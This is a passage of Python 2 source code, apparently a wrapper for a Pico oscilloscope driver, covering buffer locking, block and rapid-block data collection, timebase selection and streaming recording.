self._buffers[index].access_lock: if not self._buffers[index].inuse.acquire(False): return pico_num("PICO_BUSY") except: return pico_num("PICO_BUSY") return pico_num("PICO_OK") def unlock_buffer(self, index): """ Unlocks previously locked buffer :param index: buffer index number :type index: int :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") try: with self._buffers[index].access_lock: self._buffers[index].inuse.release() except: return pico_num("PICO_OK") return pico_num("PICO_OK") def is_buffer_locked(self, index): """ Tests if given buffer is locked :param index: buffer index number :type index: int :returns: status of the calls :rtype: int """ if self._handle <= 0 or index not in self._buffers: return False try: with self._buffers[index].access_lock: if self._buffers[index].inuse.acquire(False): try: self._buffers[index].inuse.release() except: return True else: return True except: return False return False def unlock_all_buffers(self): """ Unlocks all currently allocated and locked buffers :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if hasattr(self, "buffers"): for index in self._buffers.keys(): self.unlock_buffer(index) def release_buffer(self, index): """ Removes buffer from requested index :param index: buffer index number :type index: int :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER") """ deallocate memory """ self.unlock_buffer(index) with self._buffers[index].access_lock: a = self._buffers[index].access_lock self._buffers[index] = None self._buffers.pop(index) return pico_num("PICO_OK") def release_all_buffers(self): """ Removes all allocated buffers :returns: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if hasattr(self, "buffers"): for index in self._buffers.keys(): self.release_buffer(index) self._buffers.clear() def get_buffer_info(self, index): """ Returns dictionary with buffer setup dict: { index, channel, samples, segment, mode, downsample, last_interval, last_timebase, real_interval } :param index: buffer index number :type index: int :returns: status of the calls :rtype: tuple(int, dict()) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), {} if index not in self._buffers: return pico_num("PICO_INVALID_BUFFER"), {} with self._buffers[index].access_lock: return pico_num("PICO_OK"), { "index": index, "channel": self._buffers[index].channel, "samples": self._buffers[index].samples, "segment": self._buffers[index].segment, "mode": self._buffers[index].mode, "downsample": self._buffers[index].downsample, "last_interval": self._buffers[index].last_interval, "last_timebase": self._buffers[index].last_timebase, "real_interval": self._buffers[index].real_interval } def get_buffer_data(self, index, unlock=True): """ Returns contents of the requested buffer in the form numpy array :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data :rtype: tuple(int, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: return pico_num("PICO_OK"), self._buffers[index].data def get_buffer_volts(self, index, scale=1.0, unlock=True): """ Returns contents of the requested buffer in the form of numpy array Results can be scaled depending on value of scale parameter :param index: buffer index number :type index: int :param scale: scale of the data on return :type scale: float :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data :rtype: tuple(int, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [] with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_INVALID_BUFFER"), [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: factor = \ scale * \ (self.m.Ranges.values[self._channel_set[self._buffers[index].channel].range] / self.info.max_adc) return pico_num("PICO_OK"), self._buffers[index].data * factor def get_buffer_states(self, index, unlock=True): """ Returns contents of the requested buffer in the form of multidimensional numpy array :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data :rtype: tuple(int, np.ndarray) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [] with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_INVALID_BUFFER"), [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: return pico_num("PICO_OK"), np.array( [self._buffers[index].data & (1 << b) for b in range(0, 8)], dtype=bool) def get_min_max_data(self, index, unlock=True): """ Returns contents of the requested buffer in the form of 2 np.arrays This call applies only to aggregated mode :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data_min, data_max :rtype: tuple(int, np.array, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [], [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: if self._buffers[index].data_min is not None: return pico_num("PICO_OK"), self._buffers[index].data_min, self._buffers[index].data else: return pico_num("PICO_OK"), self._buffers[index].data, self._buffers[index].data def get_min_max_volts(self, index, scale=1.0, unlock=True): """ Returns contents of the requested buffer in the form of 2 np.arrays This call applies only to aggregated mode :param index: buffer index number :type index: int :param scale: scale of the data on return :type scale: float :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data_min, data_max :rtype: tuple(int, np.array, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [], [] with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_OK"), [], [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: factor = \ scale * \ (self.m.Ranges.values[self._channel_set[self._buffers[index].channel].range] / self.info.max_adc) if self._buffers[index].data_min is not None: return pico_num("PICO_OK"), \ self._buffers[index].data_min * factor, self._buffers[index].data * factor else: a = self._buffers[index].data * factor return pico_num("PICO_OK"), a, a def get_min_max_states(self, index, unlock=True): """ Returns contents of the requested buffer in the form of 2 multidimensional np.arrays This call applies only to aggregated mode :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, data_min, data_max :rtype: tuple(int, np.ndarray, np.ndarray) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER"), [], [] if unlock: self.unlock_buffer(index) with self._buffers[index].access_lock: if self._buffers[index].data is None: return pico_num("PICO_OK"), [], [] if self._buffers[index].data_min is not None: return pico_num("PICO_OK"), np.array( [self._buffers[index].data_min & (1 << b) for b in range(0, 8)], dtype=bool), np.array( [self._buffers[index].data & (1 << b) for b in range(0, 8)], dtype=bool) else: a = np.array([self._buffers[index].data & (1 << b) for b in range(0, 8)], dtype=bool) return pico_num("PICO_OK"), a, a def get_ets_data(self, index, unlock=True): """ Returns contents of the requested buffer in the form of 2 numpy arrays: times, data :param index: buffer index number :type index: int :param unlock: Whether to release buffer after the call :type unlock: bool :returns: status of the calls, times, data_max :rtype: tuple(int, np.array, np.array) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), [], [] if index not in self._buffers.keys() or self._ets.time is None: return pico_num("PICO_INVALID_BUFFER"), [], [] if unlock: self.unlock_buffer(index) return pico_num("PICO_OK"), self._ets.time, self._buffers[index].data def collect_segment(self, segment, interval=None, event_handle=None, timebase=None, block=True, bulk=False, overlapped=False): """ Runs Block data collection on(from) given segment. Can explicitly use supplied timebase if given or calculate one. Buffers have to be set at least on one channel to make this call work. :param segment: memory segment number to start the collection on (from) :type segment: int :param interval: sample interval in nanoseconds :type interval: float :param event_handle: event handle to use during the collection, once device is ready, it is set :type event_handle: Event :param timebase: explicit (forced) timebase value :type timebase: int :param block: whether to block the call, requires event_handle if False :type block: bool :param bulk: collect segments in bulk, better use collect_segments call :type bulk: bool :param overlapped: use overlapped buffer in collection :type overlapped: bool :returns: status of the call :rtype int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if segment > self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE") """ We expect only one collection at the time """ for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY") """ Locate buffers taking part in collection """ if bulk: if self._bulk_indexes is None or len(self._bulk_indexes) == 0: return pico_num("PICO_INVALID_BUFFER") indexes = self._bulk_indexes else: indexes = () for index in self._buffers.keys(): if self._buffers[index].segment == segment: indexes += (index,) if len(indexes) == 0: return pico_num("PICO_INVALID_BUFFER") """ pick the longest sample number from defined buffers """ samples = 0 for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].segment == segment: if self._buffers[index].mode == self.m.RatioModes.none: samples = max(samples, self._buffers[index].samples) else: samples = max(samples, self._buffers[index].samples * self._buffers[index].downsample) break if samples == 0: return pico_num("PICO_INVALID_BUFFER") """ ets setup """ if self._ets.mode != self._ets.last: if self._ets.mode == self.m.ETSModes.off: self._ets.status = ldlib.SetEts(self._chandle, c_int32(self.m.ETSModes.off), c_int16(self._ets.cycles), c_int16(self._ets.interleaves), None) if self._ets.status == pico_num("PICO_OK"): self._ets.last = self.m.ETSModes.off elif (self.trigger or True in [c.is_set() for c in (self.trigger_conditions + self.pwq_conditions)]) \ and len([1 for p in self._port_set.keys() if self._port_set[p].enabled]) == 0: picos = c_int32(0) self._ets.status = ldlib.SetEts(self._chandle, c_int32(self._ets.mode), c_int16(self._ets.cycles), c_int16(self._ets.interleaves), byref(picos)) if self._ets.status == pico_num("PICO_OK"): self._ets.last = self._ets.mode self._ets.picos = picos.value """ calculate timebase from interval """ finterval = c_float(0.0) linterval = c_float(0.0) if self._ets.last != self.m.ETSModes.off and self._ets.status == pico_num("PICO_OK"): timebase = 1 finterval.value = interval = float(picos.value) / 1000.0 if isinstance(interval, (int, long)): interval = float(interval) if timebase is not None and self._ets.last == self.m.ETSModes.off: status = self._get_timebase(timebase=timebase, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status != pico_num("PICO_OK"): return status if timebase is None: for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].last_interval is not None \ and self._buffers[index].last_timebase is not None: if self._buffers[index].last_interval == interval: timebase = self._buffers[index].last_timebase finterval.value = self._buffers[index].real_interval break if timebase is None: last = 0 status = pico_num("PICO_OK") for pwr in range(0, 32): rough = 1 << pwr status = self._get_timebase(timebase=rough, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status not in (pico_num("PICO_OK"), pico_num("PICO_INVALID_TIMEBASE")) \ or finterval.value >= interval: break last = rough else: rough = last if status == pico_num("PICO_TOO_MANY_SAMPLES"): return status if last == rough or finterval.value == interval: timebase = rough else: if last <= 32: fine = rough for fine in range(int(last / 2), 64): status = self._get_timebase(timebase=fine, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status == pico_num("PICO_OK") and finterval.value >= interval: break linterval.value = finterval.value if abs(interval - finterval.value) <= abs(interval - linterval.value): timebase = fine else: timebase = max(1, fine - 1) finterval.value = linterval.value if linterval.value > 0 else interval else: """ bubble :) """ i = 1 linterval.value = finterval.value fine = rough while timebase is None: if i >= 32: timebase = fine break elif linterval.value > interval: fine -= int((rough - last) / pow(2, i)) elif linterval.value < interval: fine += int((rough - last) / pow(2, i)) else: timebase = fine continue status = self._get_timebase(timebase=fine, samples=samples, ref_interval=byref(finterval), oversample=0, ref_maxsamples=None, segment=segment) if status == pico_num("PICO_OK") and finterval.value in (interval, linterval.value): timebase = fine continue linterval.value = finterval.value i += 1 else: pass if not bulk: self._lock_buffer(index) for index in indexes: with self._buffers[index].access_lock: self._buffers[index].last_interval = interval self._buffers[index].last_timebase = timebase self._buffers[index].real_interval = finterval.value """ setup callback """ self._collect_cb_type = self._block_ready() self._collect_cb_func = self._collect_cb_type(self._collect_cb) self._collect_indexes = indexes if event_handle is not None: self._collect_event = event_handle self._collect_event.clear() if self.trigger or True in [c.is_set() for c in (self.trigger_conditions + self.pwq_conditions)]: pretrig = int(samples * self.trigg_ratio) posttrig = samples - pretrig else: pretrig = 0 posttrig = samples if overlapped: status = self.set_overlapped_buffers(self._collect_indexes) if status != pico_num("PICO_OK"): return status """ run block collection """ try: status = self._run_block(pretrig=pretrig, posttrig=posttrig, timebase=timebase, oversample=0, ref_time=None, segment=segment, ref_cb=self._collect_cb_func, ref_cb_param=None) except Exception as ex: print "Run Block(%d):" % sys.exc_info()[-1].tb_lineno, ex.message, type(ex) self.stop() status = pico_num("PICO_OPERATION_FAILED") if status != pico_num("PICO_OK"): return status if block: self._collect_event.wait() if not overlapped: if bulk: status = self._get_buffer_values_bulk(self._collect_indexes) else: status = self._get_buffer_values(self._collect_indexes) else: if bulk: pass else: for c in self._channel_set.keys(): self._channel_set[c].overvoltaged = self._overlapped_ov.value & (1 << c) != 0 self._collect_event.clear() return status else: return pico_num("PICO_OK") def _run_block(self, pretrig, posttrig, timebase, oversample, ref_time, segment, ref_cb, ref_cb_param): return ldlib.RunBlock(self._chandle, c_int32(pretrig), c_int32(posttrig), c_uint32(timebase), c_int16(oversample), ref_time, c_uint32(segment), ref_cb, ref_cb_param) def collect_segment_overlapped(self, segment, interval=None, event_handle=None, timebase=None, block=True): """ Runs Block data collection on(from) given segment in overlapped setup. Can explicitly use supplied timebase if given or calculate one. Buffers have to be set at least on one channel to make this call work. :param segment: memory segment number to start the collection on (from) :type segment: int :param interval: sample interval in nanoseconds :type interval: float :param event_handle: event handle to use during the collection, once device is ready, it is set :type event_handle: Event :param timebase: explicit (forced) timebase value :type timebase: int :param block: whether to block the call, requires event_handle if False :type block: bool :param bulk: collect segments in bulk, better use collect_segments call :type bulk: bool :param overlapped: use overlapped buffer in collection :type overlapped: bool :returns: status of the call :rtype int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") return self.collect_segment(segment=segment, interval=interval, event_handle=event_handle, timebase=timebase, block=block, overlapped=True) def _collect_cb(self, *args): """ Callback function for collect segment run block """ try: if self._collect_event is not None: self._collect_event.set() except: return def collect_segments(self, start_segment, stop_segment, interval=None, event_handle=None, timebase=None, block=True): """ Initiates Rapid Block Collection :param start_segment: number of segment to start the collection from :type start_segment: int :param stop_segment: number of last segment to be collected :type stop_segment: int :param interval: nanoseconds per sample, optional if timebase specified :type interval: int :param event_handle: reference to the event object to notify about completion :type event_handle: threading._Event :param timebase: optional timebase to skip internal calculation from interval :type timebase: int :return: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if start_segment >= self._segments or stop_segment >= self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE") for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY") number = stop_segment - start_segment + 1 if stop_segment >= start_segment \ else self._segments - start_segment + stop_segment + 1 status = self._set_no_of_captures(number=number) if status != pico_num("PICO_OK"): return status segs = (start_segment,) if start_segment == stop_segment \ else range(start_segment, stop_segment + 1) if stop_segment > start_segment \ else range(start_segment, self._segments) + range(0, stop_segment + 1) self._bulk_indexes = () for index in self._buffers.keys(): with self._buffers[index].access_lock: if self._buffers[index].segment in segs: self._bulk_indexes += (index,) self._start_segment = start_segment self._stop_segment = stop_segment status = self.collect_segment(start_segment, interval=interval, event_handle=event_handle, timebase=timebase, bulk=True, block=block) self._start_segment = None self._stop_segment = None for index in self._buffers.keys(): with self._buffers[index].access_lock: if self._buffers[index].segment == start_segment: interval = self._buffers[index].last_interval timebase = self._buffers[index].last_timebase real_int = self._buffers[index].real_interval break else: interval = 0 timebase = 0 real_int = 0 for index in self._buffers.keys(): with self._buffers[index].access_lock: if self._buffers[index].segment in segs: self._buffers[index].last_interval = interval self._buffers[index].last_timebase = timebase self._buffers[index].real_interval = real_int self._lock_buffer(index) return status def set_overlapped_buffers(self, indexes): """ Preallocate collection buffers in overlapped mode :param indexes: list of buffer indexes to preallocate :type indexes: list, tuple :return: status of the calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if len(indexes) == 0: return pico_num("PICO_INVALID_BUFFER") """ get values into buffers """ self._overlapped_samples.value = 0 status = pico_num("PICO_OK") segs = () ds = None mode = 0 for index in indexes: with self._buffers[index].access_lock: if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER") self._buffers[index].nanooffset = 0 if self._buffers[index].samples > self._overlapped_samples.value: self._overlapped_samples.value = self._buffers[index].samples if self._buffers[index].segment not in segs: segs += (self._buffers[index].segment,) if ds is None: ds = self._buffers[index].downsample elif ds != self._buffers[index].downsample: return pico_num("PICO_INVALID_BUFFER") mode |= self._buffers[index].mode self._overlapped_samples.value *= ds if len(segs) == 0: return pico_num("PICO_INVALID_BUFFER") elif len(segs) > 1: self._overlapped_ov = np.zeros(shape=(len(segs), ), dtype=c_uint32) status = ldlib.GetValuesOverlappedBulk(self._chandle, c_uint32(0), byref(self._overlapped_samples), c_uint32(ds), c_int32(mode), c_uint32(min(segs)), c_uint32(max(segs)), self._overlapped_ov.ctypes) else: self._overlapped_ov = c_uint32(0) status = ldlib.GetValuesOverlapped(self._chandle, c_uint32(0), byref(self._overlapped_samples), c_uint32(ds), c_int32(mode), c_uint32(segs[0]), byref(self._overlapped_ov)) if status != pico_num("PICO_OK"): return status """ set buffer on the driver """ for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].data is None or len(self._buffers[index].data) != self._buffers[index].samples: self._buffers[index].data = np.empty(self._buffers[index].samples, c_int16) if self._buffers[index].mode == self.m.RatioModes.agg: if self._buffers[index].data_min is None \ or len(self._buffers[index].data_min) != self._buffers[index].samples: self._buffers[index].data_min = np.empty(self._buffers[index].samples, c_int16) status = self._setbuffers(indexes) return status def _set_no_of_captures(self, number): return ldlib.SetNoOfCaptures(self._chandle, c_uint32(number)) def _get_buffer_values(self, indexes): """ Pulls values from the driver to the buffer of requested indexes :param indexes: list of index of buffers to fill them with data :type indexes: tuple :return: picostatus number of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") """ get values into buffers """ status = pico_num("PICO_OK") segment = None modes = {} max_samples = 0 for index in indexes: with self._buffers[index].access_lock: if index not in self._buffers.keys(): return pico_num("PICO_INVALID_BUFFER") if segment is None: segment = self._buffers[index].segment elif segment != self._buffers[index].segment: return pico_num("PICO_TOO_MANY_SEGMENTS") self._buffers[index].nanooffset = 0 bufflen = self._buffers[index].samples if bufflen > max_samples: max_samples = bufflen """ set buffer on the driver """ if self._buffers[index].data is None or len(self._buffers[index].data) != bufflen: self._buffers[index].data = np.empty(bufflen, c_int16) if self._buffers[index].mode == self.m.RatioModes.agg: if self._buffers[index].data_min is None or len(self._buffers[index].data_min) != bufflen: self._buffers[index].data_min = np.empty(bufflen, c_int16) if self._buffers[index].mode not in modes.keys(): modes[self._buffers[index].mode] = self._buffers[index].downsample status = self._setbuffer(index) if status != pico_num("PICO_OK"): continue if self._ets.mode != self.m.ETSModes.off and self._ets.mode == self._ets.last: if self._ets.time is None or len(self._ets.time) != max_samples: self._ets.time = np.empty(max_samples, c_int64) status = ldlib.SetEtsTimeBuffer(self._chandle, self._ets.time.ctypes, max_samples) else: self._ets.time = None """ copy data """ overvoltaged = c_int16(0) for mode in modes.keys(): samples = c_uint32(max_samples * (modes[mode] if modes[mode] else 1)) self._get_values(start=0, ref_samples=byref(samples), ratio=modes[mode], mode=mode, segment=segment, ref_overflow=byref(overvoltaged)) status = ldlib.SetEtsTimeBuffer(self._chandle, None, samples.value) """ tell driver to release buffers """ status = self._setbuffers(indexes, False) """ check for overvoltage """ if overvoltaged.value != 0: for c in self._channel_set.keys(): self._channel_set[c].overvoltaged = overvoltaged.value & (1 << c) != 0 return status def _get_values(self, start, ref_samples, ratio, mode, segment, ref_overflow): return ldlib.GetValues(self._chandle, c_uint32(start), ref_samples, c_uint32(ratio), c_int32(mode), c_uint32(segment), ref_overflow) def _get_buffer_values_bulk(self, indexes): """ Pulls values from the driver to the buffer of requested indexes - in one bulk :param indexes: list of index of buffers to fill them with data :type indexes: tuple :return: picostatus number of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self._start_segment is None or self._stop_segment is None: return pico_num("PICO_INVALID_BUFFER") """ organise time offsets """ nanooffsets = {} length = self._stop_segment - self._start_segment + 1 if self._stop_segment >= self._start_segment \ else self._segments - self._start_segment + self._stop_segment + 1 offsets = np.zeros(length, dtype=c_int64) units = np.zeros(length, dtype=c_int32) status = self._get_values_trigger_time_offset_bulk(ref_offsets=offsets.ctypes, ref_units=units.ctypes, start_segment=self._start_segment, stop_segment=self._stop_segment) if status != pico_num("PICO_OK"): return status segment = self._start_segment for i in range(0, length): nanooffsets[segment] = offsets[i] * (10 ** self.m.TimeUnits.nanofactors(units[i])) segment += 1 if segment >= self._segments: segment = 0 """ get values into buffers """ samples = c_uint32() mode = self.m.RatioModes.none if len(indexes) > 0: with self._buffers[indexes[0]].access_lock: samples.value = self._buffers[indexes[0]].samples ratio = self._buffers[indexes[0]].downsample else: return pico_num("PICO_NO_SAMPLES_AVAILABLE") for index in indexes: with self._buffers[index].access_lock: if self._buffers[index].samples != samples.value or self._buffers[index].downsample != ratio: return pico_num("PICO_INVALID_BUFFER") self._buffers[index].nanooffset = nanooffsets[self._buffers[index].segment] """ set buffer on the driver """ if self._buffers[index].data is None or len(self._buffers[index].data) != samples.value: self._buffers[index].data = np.empty(samples.value, c_int16) if self._buffers[index].mode == self.m.RatioModes.agg: if self._buffers[index].data_min is None or len(self._buffers[index].data_min) != samples.value: self._buffers[index].data_min = np.empty(samples.value, c_int16) mode |= self._buffers[index].mode status = self._setbuffers(indexes) if status != pico_num("PICO_OK"): return status overvoltaged = np.zeros(length, dtype=c_int16) status = self._get_values_bulk(ref_samples=byref(samples), start_segment=self._start_segment, stop_segment=self._stop_segment, ratio=ratio, mode=mode, ref_overflow=overvoltaged.ctypes) if status != pico_num("PICO_OK"): return status """ check for overvoltage """ for c in self._channel_set.keys(): bit = 1 << c self._channel_set[c].overvoltaged = bit in (overvoltaged & bit) """ tell driver to release buffers """ status = self._setbuffers(indexes, False) return status def _setbuffer(self, index, enable=True): return self._setbuffers(indexes=(index,), enable=enable) def _setbuffers(self, indexes, enable=True): for index in indexes: with self._buffers[index].access_lock: status = \ self._set_data_buffers(line=self._buffers[index].channel, buffer_max=self._buffers[index].data.ctypes if enable else None, buffer_min=(self._buffers[index].data_min.ctypes if enable and self._buffers[index].mode == self.m.RatioModes.agg else None), bufflen=self._buffers[index].samples, segment=self._buffers[index].segment, mode=self._buffers[index].mode) if status != pico_num("PICO_OK"): return status return pico_num("PICO_OK") def _get_values_trigger_time_offset_bulk(self, ref_offsets, ref_units, start_segment, stop_segment): return ldlib.GetValuesTriggerTimeOffsetBulk(self._chandle, ref_offsets, ref_units, c_uint32(start_segment), c_uint32(stop_segment)) def _get_values_bulk(self, ref_samples, start_segment, stop_segment, ratio, mode, ref_overflow): return ldlib.GetValuesBulk(self._chandle, ref_samples, c_uint32(start_segment), c_uint32(stop_segment), c_uint32(ratio), c_int32(mode), ref_overflow) def load_tape(self, tape): """ Loads/sets which streaming tape to use :param tape: tape object :type tape: StreamingTape :returns: status of the call :rtype int """ if self._tape is not None: self.eject_tape() if isinstance(tape, StreamingTape): self._tape = tape return pico_num("PICO_OK") else: return pico_num("PICO_INVALID_PARAMETER") def eject_tape(self): """ Removes tape reference and prunes recording buffers :returns: PICO_OK :rtype: int """ if self._tape is not None: self._tape = None self._records = None self._leavers = None return pico_num("PICO_OK") def start_recording(self, interval, units, mode, downsample=1, memlength=0, limit=0, chapter=None): """ Initiates Stream recording to the tape with requested sampling interval :param interval: interval per collected raw sample :type interval: int :param units: interval units, from TimeUnits :type units: int :param mode: data reduction mode, from RatioModes :type mode: int :param downsample: data reduction ratio :type downsample: int :param memlength: number of raw samples in memory buffers :type memlength: int :param limit: number of samples at which device will issue autostop, 0 to stream until stopped. Required for horizontal trigger ratio in streaming to work. :type limit: int :param chapter: Chapter name for the records :type chapter: string, None :rtype: int :returns: status of the call """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if units not in self.m.TimeUnits.map: return pico_num("PICO_INVALID_TIMEBASE") if self._tape is None: return pico_num("PICO_BUFFERS_NOT_SET") for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY") if downsample == 0: return pico_num("PICO_INVALID_PARAMETER") with self._recording_lock: """ Gather how many channels/ports are enabled/engaged """ enabled = len([1 for c in self._channel_set.keys() if self._channel_set[c].enabled]) engaged = len([1 for p in self._port_set.keys() if self._port_set[p].enabled]) """ none of the channels/ports are enabled """ if enabled + engaged == 0: if enabled == 0: return pico_num("PICO_INVALID_CHANNEL") if engaged == 0: return pico_num("PICO_INVALID_DIGITAL_PORT") """ initialize records """ self._records = StreamingTapeRecording() self._leavers = None self._records.device = self.info.variant_info self._records.serial = self.info.batch_and_serial """ Determine how many ratio modes to set up """ self._records.modes = self.m.RatioModes.mode2dict(mode) # overview buff len if memlength == 0: if limit == 0: # half a second of data desired = \ int(interval * float(pow(10, self.m.TimeUnits.secfactors(units))) * ceil((enabled + engaged) / 2.0)) bufflen = min(desired, STREAM_LENGTH) else: bufflen = limit else: bufflen = memlength if limit == 0: samples = bufflen * downsample else: samples = limit * downsample if bufflen > samples: bufflen = samples if chapter is None: self._records.chapter = self._make_chapter_tag() else: self._records.chapter = chapter self._records.enabled = enabled + engaged self._records.units = units self._records.mode = mode self._records.downsample = downsample self._records.bufflen = bufflen self._records.max_samples = samples self._records.buffers = {} if limit > 0: self._records.final = False triggadv = (True in [c.is_set() for c in self.trigger_conditions]) triggpwq = (True in [c.is_set() for c in self.pwq_conditions]) if self.trigger or triggadv or triggpwq: self._records.triggerSet = True self._records.triggered = False pretrigger = min(samples, int(samples * self.trigg_ratio)) postrigger = samples - pretrigger if self.trigger: self._records.triggerSource = self.trigg_source self._records.triggerThreshold = self.trigg_threshold self._records.triggerDirection = self.trigg_direction if triggadv: self._records.triggerConditions = self.trigger_conditions self._records.triggerAnalog = self.trigger_analog self._records.triggerDigital = self.trigger_digital if triggpwq: self._records.pwqConditions = self.pwq_conditions self._records.pwqDirection = self.pwq_direction self._records.pwqLower = self.pwq_lower self._records.pwqUpper = self.pwq_upper self._records.pwqType = self.pwq_type else: self._records.triggerSet = False pretrigger = 0 postrigger = samples lines = () for chann in [c for c in self._channel_set.keys() if self._channel_set[c].enabled]: self._records.buffers[chann] = {} self._records.buffers[chann]["range"] = self._channel_set[chann].range self._records.buffers[chann]["scale"] = self.m.Ranges.values[self._channel_set[chann].range] lines += (chann,) for port in [p for p in self._port_set.keys() if self._port_set[p].enabled]: self._records.buffers[port] = {} self._records.buffers[port]["level"] = self._port_set[port].level lines += (port,) """ forcibly create raw buffer, if single """ for line in lines: status = pico_num("PICO_OK") if self._records.mode == self.m.RatioModes.raw: self._records.buffers[line]["raw"] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) status = self._set_data_buffers(line=line, buffer_max=self._records.buffers[line]["raw"].ctypes, buffer_min=None, bufflen=self._records.bufflen, segment=0, mode=self.m.RatioModes.raw) else: for m in self._records.modes: if self._records.modes[m] == self.m.RatioModes.agg: self._records.buffers[line]["min"] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) self._records.buffers[line]["max"] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) status = self._set_data_buffers(line=line, buffer_max=self._records.buffers[line]["max"].ctypes, buffer_min=self._records.buffers[line]["min"].ctypes, bufflen=self._records.bufflen, segment=0, mode=self.m.RatioModes.agg) else: self._records.buffers[line][m] = np.empty(shape=(self._records.bufflen,), dtype=c_int16) status = self._set_data_buffers(line=line, buffer_max=self._records.buffers[line][m].ctypes, buffer_min=None, bufflen=self._records.bufflen, segment=0, mode=self._records.modes[m]) if status != pico_num("PICO_OK"): return status interval = c_uint32(interval) status = self._run_streaming(ref_interval=byref(interval), units=units, pretrig=pretrigger, posttrig=postrigger, autostop=(limit > 0), ratio=downsample, mode=mode, overview=bufflen) if status != pico_num("PICO_OK"): return status self._records.interval = interval.value try: self._recording_thread = Thread(target=self._recording_worker, args=(None,)) if self._recording_event.is_set(): self._recording_event.clear() self._recording_thread.start() except Exception as ex: if not self._recording_event.is_set(): self._recording_event.set() self.last_error = ex.message print "Streaming Start(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) return pico_num("PICO_STREAMING_FAILED") return pico_num("PICO_OK") def _run_streaming(self, ref_interval, units, pretrig, posttrig, autostop, ratio, mode, overview): return ldlib.RunStreaming(self._chandle, ref_interval, c_int32(units), c_uint32(pretrig), c_uint32(posttrig), c_int16(autostop), c_uint32(ratio), c_int32(mode), c_uint32(overview)) @staticmethod def _make_chapter_tag(): return time.strftime("%Y%m%d_%H%M%S") def stop_recording(self): """ Stops recording (Thanks, Captain Obvious !!!) :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self._recording_thread is None or not self._recording_thread.is_alive(): return pico_num("PICO_NOT_USED_IN_THIS_CAPTURE_MODE") with self._recording_lock: self._recording_event.set() self._recording_thread.join() self._recording_thread = None return pico_num("PICO_OK") def _recording_worker(self, *args): """ Worker used in Streaming Collections """ try: """ setup callback """ self._recording_cb_type = self._streaming_ready() self._recording_cb_func = self._recording_cb_type(self._recording_cb) while not self._recording_event.is_set(): with self._recording_lock: s = ldlib.GetStreamingLatestValues(self._chandle, self._recording_cb_func, None) if s not in (pico_num("PICO_OK"), pico_num("PICO_BUSY")) \ or (self._tape is not None and not self._tape.is_processing()): break ldlib.Stop(self._chandle) if self._tape is not None: self._tape.record(None) except Exception as ex: self.last_error = ex.message print "Streaming Worker(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) finally: with self._recording_lock: self._recording_event.clear() def _recording_cb(self, handle, 